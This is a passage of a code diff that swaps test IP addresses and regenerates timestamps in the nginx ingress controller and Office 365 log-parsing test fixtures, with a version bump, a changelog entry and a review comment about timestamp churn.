+1240,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -1275,8 +1257,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394958800Z", - "original": "77.179.66.156 - - [07/Feb/2020:11:56:54 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b", + "ingested": "2021-12-09T13:41:46.110220400Z", + "original": "67.43.156.13 - - [07/Feb/2020:11:56:54 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1312,7 +1294,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web2-8080", @@ -1328,26 +1310,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/v2" @@ -1361,7 +1325,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -1377,8 +1341,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394963400Z", - "original": "77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d", + "ingested": "2021-12-09T13:41:46.110226700Z", + "original": "67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1414,7 +1378,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web-8080", @@ -1430,26 +1394,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/favicon.ico" @@ -1463,7 +1409,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -1480,8 +1426,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394968Z", - "original": "77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789", + "ingested": "2021-12-09T13:41:46.110231600Z", + "original": "67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1517,7 +1463,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web-8080", @@ -1533,26 +1479,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/products/42?address=delhi+technological+university" @@ -1566,7 +1494,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -1582,8 +1510,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394972700Z", - "original": "77.179.66.156 - - [07/Feb/2020:12:00:28 +0000] \"GET /products/42?address=delhi+technological+university HTTP/1.1\" 200 59 \"-\" \"python-requests/2.22.0\" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214", + "ingested": "2021-12-09T13:41:46.110236800Z", + "original": "67.43.156.13 - - [07/Feb/2020:12:00:28 +0000] \"GET /products/42?address=delhi+technological+university HTTP/1.1\" 200 59 \"-\" \"python-requests/2.22.0\" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1614,7 +1542,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web2-8080", @@ -1630,26 +1558,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/v2" @@ -1663,7 +1573,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -1679,8 +1589,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394984Z", - "original": "77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79", + "ingested": "2021-12-09T13:41:46.110343100Z", + "original": "67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1716,7 +1626,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web-8080", @@ -1732,26 +1642,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/favicon.ico" @@ -1765,7 +1657,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -1781,8 +1673,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T12:42:48.394988800Z",
- "original": "77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f",
+ "ingested": "2021-12-09T13:41:46.110350500Z",
+ "original": "67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "category": [
@@ -1818,7 +1710,7 @@
 }
 },
 "remote_ip_list": [
- "77.179.66.156"
+ "67.43.156.13"
 ],
 "upstream": {
 "name": "default-web2-8080",
@@ -1834,26 +1726,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "DE-RP",
- "city_name": "Germersheim",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Rheinland-Pfalz",
- "location": {
- "lon": 8.3639,
- "lat": 49.2231
- }
- },
- "as": {
- "number": 6805,
- "organization": {
- "name": "Telefonica Germany"
- }
- },
- "address": "77.179.66.156",
- "ip": "77.179.66.156"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "url": {
 "original": "/v2/some"
@@ -1867,7 +1741,7 @@
 },
 "related": {
 "ip": [
- "77.179.66.156"
+ "67.43.156.13"
 ]
 },
 "http": {
@@ -1883,8 +1757,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T12:42:48.394994300Z",
- "original": "77.179.66.156 - - [07/Feb/2020:12:02:42 +0000] \"GET /v2/some HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402",
+ "ingested": "2021-12-09T13:41:46.110356700Z",
+ "original": "67.43.156.13 - - [07/Feb/2020:12:02:42 +0000] \"GET /v2/some HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "category": [
diff --git a/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json b/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json
index 1365c1a3d73..49a8aec4396 100644
--- a/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json
+++ b/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json
@@ -19,7 +19,7 @@
 },
 "message": "Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt, but got err: open /var/run/secrets/kubernetes.io/serviceaccount/ca.crt: no such file or directory",
 "event": {
- "ingested": "2021-06-09T12:42:49.083062900Z",
+ "ingested": "2021-12-09T13:41:49.163645200Z",
 "original": "E1215 04:15:13.816036 8 config.go:489] Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt, but got err: open /var/run/secrets/kubernetes.io/serviceaccount/ca.crt: no such file or directory",
 "timezone": "GMT+1",
 "created": "2020-12-16T11:39:15.954Z",
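Review bot: Every line changed in the -19,7 hunk of test-error-raw.log-expected.json, and likewise in its -54, -89, -124, -159, -194 and -229 hunks, is a fresh `event.ingested` timestamp; as far as this diff shows, nothing in the error data stream's input or pipeline is touched by the IP change, so these lines are regeneration noise rather than part of the fix. Unless the pipeline test harness already ignores `event.ingested`, the churn will repeat on every regeneration and buries the expected values that actually moved. Consider dropping this file from the PR, or leaving `event.ingested` out of the expected fixtures if the harness tolerates its absence.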
@@ -54,7 +54,7 @@
 },
 "message": "\"Creating API client\" host=\"https://127.0.0.1:443\"",
 "event": {
- "ingested": "2021-06-09T12:42:49.083081500Z",
+ "ingested": "2021-12-09T13:41:49.163654300Z",
 "original": "I1215 14:15:13.816067 8 main.go:236] \"Creating API client\" host=\"https://127.0.0.1:443\"",
 "timezone": "GMT+1",
 "created": "2020-12-16T11:39:15.954Z",
@@ -89,7 +89,7 @@
 },
 "message": "\"Trying to discover Kubernetes version\"",
 "event": {
- "ingested": "2021-06-09T12:42:49.083087100Z",
+ "ingested": "2021-12-09T13:41:49.163660600Z",
 "original": "I1215 14:15:13.816334 8 main.go:256] \"Trying to discover Kubernetes version\"",
 "timezone": "GMT+1",
 "created": "2020-12-16T11:39:15.954Z",
@@ -124,7 +124,7 @@
 },
 "message": "Response Headers:",
 "event": {
- "ingested": "2021-06-09T12:42:49.083093Z",
+ "ingested": "2021-12-09T13:41:49.163666700Z",
 "original": "I1215 14:15:13.816854 8 round_trippers.go:449] Response Headers:",
 "timezone": "GMT+1",
 "created": "2020-12-16T11:39:15.954Z",
@@ -159,7 +159,7 @@ }, "message": "Error while initiating a connection to the Kubernetes API server. This could mean the cluster is misconfigured (e.g. it has invalid API server certificates or Service Accounts configuration). Reason: Get \"https://127.0.0.1:443/version?timeout=32s\": dial tcp 127.0.0.1:443: connect: connection refused\nRefer to the troubleshooting guide for more information: https://kubernetes.github.io/ingress-nginx/troubleshooting/\ngoroutine 1 [running]:\nk8s.io/klog/v2.stacks(0xc00000e001, 0xc0004fc6c0, 0x1cd, 0x228)\n\tk8s.io/klog/v2@v2.3.0/klog.go:996 +0xb9\nk8s.io/klog/v2.(*loggingT).output(0x28fb700, 0xc000000003, 0x0, 0x0, 0xc000344770, 0x28499eb, 0x7, 0x126, 0x0)\n\tk8s.io/klog/v2@v2.3.0/klog.go:945 +0x191\nk8s.io/klog/v2.(*loggingT).printf(0x28fb700, 0x3, 0x0, 0x0, 0x1c19509, 0x13f, 0xc00009ff08, 0x1, 0x1)\n\tk8s.io/klog/v2@v2.3.0/klog.go:733 +0x17a\nk8s.io/klog/v2.Fatalf(...)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1463\nmain.handleFatalInitError(...)\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:294\nmain.main()\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:78 +0x32f\n\ngoroutine 6 [chan receive]:\nk8s.io/klog/v2.(*loggingT).flushDaemon(0x28fb700)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1131 +0x8b\ncreated by k8s.io/klog/v2.init.0\n\tk8s.io/klog/v2@v2.3.0/klog.go:416 +0xd8", "event": { - "ingested": "2021-06-09T12:42:49.083097800Z", + "ingested": "2021-12-09T13:41:49.163672700Z", "original": "F1215 14:16:33.326604 8 main.go:294] Error while initiating a connection to the Kubernetes API server. This could mean the cluster is misconfigured (e.g. it has invalid API server certificates or Service Accounts configuration). 
Reason: Get \"https://127.0.0.1:443/version?timeout=32s\": dial tcp 127.0.0.1:443: connect: connection refused\nRefer to the troubleshooting guide for more information: https://kubernetes.github.io/ingress-nginx/troubleshooting/\ngoroutine 1 [running]:\nk8s.io/klog/v2.stacks(0xc00000e001, 0xc0004fc6c0, 0x1cd, 0x228)\n\tk8s.io/klog/v2@v2.3.0/klog.go:996 +0xb9\nk8s.io/klog/v2.(*loggingT).output(0x28fb700, 0xc000000003, 0x0, 0x0, 0xc000344770, 0x28499eb, 0x7, 0x126, 0x0)\n\tk8s.io/klog/v2@v2.3.0/klog.go:945 +0x191\nk8s.io/klog/v2.(*loggingT).printf(0x28fb700, 0x3, 0x0, 0x0, 0x1c19509, 0x13f, 0xc00009ff08, 0x1, 0x1)\n\tk8s.io/klog/v2@v2.3.0/klog.go:733 +0x17a\nk8s.io/klog/v2.Fatalf(...)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1463\nmain.handleFatalInitError(...)\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:294\nmain.main()\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:78 +0x32f\n\ngoroutine 6 [chan receive]:\nk8s.io/klog/v2.(*loggingT).flushDaemon(0x28fb700)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1131 +0x8b\ncreated by k8s.io/klog/v2.init.0\n\tk8s.io/klog/v2@v2.3.0/klog.go:416 +0xd8", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -194,7 +194,7 @@ }, "message": "curl -k -v -XGET -H \"Authorization: Bearer token\" -H \"Accept: application/json, */*\" -H \"User-Agent: nginx-ingress-controller/v0.40.2 (linux/amd64) ingress-nginx/fc4ccc5eb0e41be2436a978b01477fc354f31643\" 'https://127.0.0.1:443/version?timeout=32s'", "event": { - "ingested": "2021-06-09T12:42:49.083102Z", + "ingested": "2021-12-09T13:41:49.163677500Z", "original": "I1215 14:15:13.816598 8 round_trippers.go:423] curl -k -v -XGET -H \"Authorization: Bearer token\" -H \"Accept: application/json, */*\" -H \"User-Agent: nginx-ingress-controller/v0.40.2 (linux/amd64) ingress-nginx/fc4ccc5eb0e41be2436a978b01477fc354f31643\" 'https://127.0.0.1:443/version?timeout=32s'", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", 
@@ -229,7 +229,7 @@
 },
 "message": "GET https://127.0.0.1:443/version?timeout=32s in 0 milliseconds",
 "event": {
- "ingested": "2021-06-09T12:42:49.083105900Z",
+ "ingested": "2021-12-09T13:41:49.163682400Z",
 "original": "I1215 14:15:13.816837 8 round_trippers.go:443] GET https://127.0.0.1:443/version?timeout=32s in 0 milliseconds",
 "timezone": "GMT+1",
 "created": "2020-12-16T11:39:15.954Z",
diff --git a/packages/nginx_ingress_controller/manifest.yml b/packages/nginx_ingress_controller/manifest.yml
index 8b3faf3fbd8..5f79dcb9202 100644
--- a/packages/nginx_ingress_controller/manifest.yml
+++ b/packages/nginx_ingress_controller/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: nginx_ingress_controller
 title: Nginx Ingress Controller Logs
-version: 1.2.0
+version: 1.2.1
 license: basic
 description: Collect and parse logs from Nginx Ingress Controller instances with Elastic Agent.
 type: integration
diff --git a/packages/o365/changelog.yml b/packages/o365/changelog.yml
index d57bdcbcc83..5d15fe3dcad 100644
--- a/packages/o365/changelog.yml
+++ b/packages/o365/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.3.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.3.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json
index 28cc7c19059..af5bceda098 100644
--- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json
@@ -2,7 +2,7 @@ "events": [ { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n 
\\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedPr